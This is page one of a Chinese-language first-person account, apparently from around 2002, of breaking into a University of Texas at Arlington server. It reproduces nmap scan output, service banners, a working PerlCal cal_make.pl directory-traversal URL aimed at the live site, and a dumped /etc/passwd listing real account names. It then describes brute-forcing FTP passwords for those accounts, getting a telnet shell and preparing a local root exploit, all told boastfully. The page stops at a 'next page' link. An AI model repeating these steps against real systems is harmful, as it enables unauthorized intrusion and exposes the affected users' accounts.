一次利用show files类cgi漏洞成功入侵uta.edu的经历

nmap -sS -O -vv 129.107.56.154 Starting nmap V. 2.54BETA32 ( www.insecure.org/nmap ) Host sun250.uta.edu (129.107.56.154) appears to be up ... good. Initiating SYN Stealth Scan against sun250.uta.edu (129.107.56.154) Adding open port 443/tcp Adding open port 514/tcp Adding open port 111/tcp Adding open port 21/tcp Adding open port 587/tcp Adding open port 23/tcp Adding open port 6000/tcp Adding open port 80/tcp Adding open port 22/tcp Adding open port 32772/tcp Adding open port 32771/tcp Adding open port 3306/tcp The SYN Stealth Scan took 33 seconds to scan 1554 ports. For OSScan assuming that port 21 is open and port 1 is closed and neither are firewalled Interesting ports on sun250.uta.edu (129.107.56.154): (The 1532 ports scanned but not shown below are in state: closed) Port State Service 21/tcp open ftp 22/tcp open ssh 23/tcp open telnet 25/tcp filtered smtp 53/tcp filtered domain 80/tcp open http 111/tcp open sunrpc 137/tcp filtered netbios-ns 138/tcp filtered netbios-dgm 139/tcp filtered netbios-ssn 161/tcp filtered snmp 162/tcp filtered snmptrap 443/tcp open https 445/tcp filtered microsoft-ds 514/tcp open shell 587/tcp open submission 3306/tcp open my sql 6000/tcp open X11 6346/tcp filtered gnutella 6699/tcp filtered napster 32771/tcp open sometimes-rpc5 32772/tcp open sometimes-rpc7 Remote operating system guess: Sun Solaris 8 early acces beta through actual release OS Fingerprint: TSeq(Class=TR%IPID=I%TS=100HZ) T1(Resp=Y%DF=Y%W=60DA%ACK=S++%Flags=AS%Ops=NNTNWM) T2(Resp=N) T3(Resp=N) T4(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=) T5(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=) T6(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=) T7(Resp=Y%DF=Y%W=0%ACK=S%Flags=AR%Ops=) PU(Resp=N) Uptime 7.325 days (since Tue May 07 07:03:54 2002) TCP Sequence Prediction: Class=truly random Difficulty=9999999 (Good luck!) TCP ISN Seq. Numbers: 3F1DE88F 900E621B 22316BB6 E50C108F D6DE4B4B 7089B80B IPID Sequence Generation: Incremental Nmap run completed -- 1 IP address (1 host up) scanned in 50 seconds

我来解释一下:)-sS 是选择用syn扫描,嘻嘻,原理不多说-O是判断主机类型,大家都知道nmap的利用tcp/ip堆栈判断系统类型很厉害.-vv是为了 看到详细过程! faint,这么多被filter的端口~~~@ _ @我KAO,连25的smtp和161的snmp都给filter了,这里32771和32772等是随机端口,说明有人在远程使用这个机 子~~~~@ _ @,看来今天要小心,上面有人!!不过还是有几个让我兴奋的端口,比如21,22,23,111,80,514,3306等. 好,我们再来看主机类型@ _ @faint,居然是Sun Solaris 8 early acces beta through actual release还好不是最新版,还有点办法~~~@ _ @不过 sunos5.8的大bug好象不多,管他的,先事事snmpdmid的那个古老的远程溢出~~~@ _ @结果failed,果然不出所料,这种大型网站一般比较坚挺~~~@ _ @ 恩,试了几个rpc都不行~~~@ _ @ 好了,第一轮探测结束,现在开始第二轮,再用nc,看下各个 服务 的banner再说~~~ 以下是nc的结果 220 sun250 FTP server (Version wu-2.6.2(1) Tue May 7 09:50:51 CDT 2002) ready. KAO,把我吓着了~~~@ _ @wuftp2.6.2,看来即使有帐号这条路也走不通了 SSH-2.0-OpenSSH _ 3.1p1 倒~~~@ _ @真是神仙~~~~这么高的版本,看来ssh这条路也难走~~~ telnet 23一下看,只看到是sunos5.8随便试了几个帐号比如test都没成功,这样不是办法啊~~~@ _ @ 啊,还有个3306的my sql 比较好看~~用客户端连连看,结果要 密码 ~~~faint 难道真的没有办法了吗~~~???我实在是不愿意走cgi这条路~~~@ _ @,唉,没办法,我们来吧~~~ 于是我拿出了sss(我们的shadow)先扫扫~~~@ _ @再看,由于我一直找不到好的cgi扫描器,所以目前一般用sss扫cgi,伤脑筋,谁有好的记得告诉我 让他慢慢扫了,我先去和x-laser打桌球去~~~@ _ @呵呵,x-laser今天去会考,祝他好运!唉,sss就是让我等的心急~~~~听歌去,现在日本新出个歌手 叫鬼束千寻 ,歌很不错啊~~~推荐大家听听..... sss扫好了,放眼望去,结果一般,不过有一个cgi 漏洞 ~~~-------cal _ make.pl,tmd,今天前面扯了这么久终于进入正题了!去hack.co.za的镜像翻 了翻,发现这个属于showfile类型,也就是说可以读取文件!!哈哈,描述如下

Name : PerlCal About : cal _ make.pl of the PerlCal script may allow remote users(website visitors) to view any file on a webserver (dependingon the user the webserver is running on). Exploit: http://www.VULNERABLE.com/cgi-bin/cal _ make.pl?\ p0=../../../../../../../../../../../../etc/passwd%00 by: stan (stan@whizkunde.org)

这应该是一个计数器程序的 漏洞 ,嘿嘿,看来uta.edu百密必有一疏,cgi和udp一般是不被人重视的.我们现在试试这个 漏洞 看~~~@ _ @ 在浏览器输入 http://www.uta.edu/cgi-bin/perlcal/cal _ make.pl?p0=../../../../../../../../../../../../../etc/passwd%00 YAHOOOOOOOOOOOOOOOOOOOOO~~~~~~我们成功了,we got it~~~哈哈哈哈哈哈,爽,看到大量帐号,我有预感今天要发财. 显示如下

root:x:0:1:Super-User:/:/sbin/sh acctmgr:x:0:3040:PUID Account Manager:/home/acs/acctmgr:/usr/bin/tcsh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp: uucp:x:5:5:uucp Admin:/usr/lib/uucp: nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network Admin:/usr/net/nls: nobody:x:60001:60001:Nobody:/: noaccess:x:60002:60002:No Access User:/: nobody4:x:65534:65534:SunOS 4.x Nobody:/: bbuser:x:200:3040:Big Brother User Account:/home/acs/bbuser:/usr/bin/tcsh lynx:x:201:50:Apache User:/:/usr/local/bin/false my sql :x:29840:1::/home/my sql :/bin/sh jth:x:12715:10:JASON T .......

下面还有好多,限于篇幅就不写了~~~@ _ @不过,这是一个shadow过了passwd,怎么办?很多人到这里就放弃,不过如果我放弃了就做不了幻影旅团团 长了~~~~得到用户名的第一反应应该是高兴,特别是得到了大量的用户名的时候!因为意味着可能存在弱口令! 所以现在我们的思路就是分离出username然后做成字典,就可以跑了!这个时候,前面的ftp 服务 就显出其重要的地位了!!! 好了,说的轻松,要分离出用户名不是那么简单的!首先是这个的格式问题!浏览器里面的格式和passwd的标准格式存在出入 如果是标准格式,我们可以直接在 linux 下这样分离 假设pp是一个passwd文件 那么我 tt 通过这一句命令就实现了以上功能。写入了文件tt -d是把 “：”作为分隔符 ，-f是指取第一个字段 这样就就可以很方便的把users提出来 syshunter提供的一种方法是使用awk cat passwd│awk {if ($NF==bash) print $NF} 而这些的效果都不是很好,这个时候我的副团长atomic马上根据需要写了个小程序,用以分离username,非常好用 Atomic说: 回复:syshunter，atmoic我找到一种更简单的提炼用户名的方法 我的程序是多行/单行通吃的哦 无论你是所有文件集中在一行 (?../../../etc/passwd得到的) 还是!cat下来的都可以：） 哈哈,他的的确好用,而且是windows下的图形界面 :)同时有找出空口令的功能 可以 下载~~~@ _ @ 顺便提一句,以前coolfire的那个分离用户名的没作用@ _ @ 于是,我得到了几百个用户名!!!!马上挂上流光,跑ftp 晕~~~@ _ @开始一遍什么都没扫到~~@ _ @ KAO,我不信!几百个user会没有弱口令?不对,于是我放低线程 休息片克~~~终于有收获了~~~不过只有3个~~~ 我迫不及待的telnet上去,倒~~~@ _ @进不去,不会吧~~~~~再回过头看下passwd文件,倒~~~这个居然是没shell的faint 换~~~终于看到一个tt的帐号有shell 呵呵,好事多磨~~~,现在telnet上去喽~~!!!!!! 于是我得到了一个shell,我赶紧去找网页目录,find / -name index.htm -print 倒~~~找了很多,不过没一个是,看来是权限不够~~!! 我咬咬牙,决定得到他的root,先find一遍没有发现可用的 suid shell 恩,看来安全设置不错,幸好还允许我生成core文件,所以我准备来本地溢出. 在安焦上找了个 代码 ,嘿嘿,在国内我成功过的,现在来看看.

上一页  [1] [2] [3] 下一页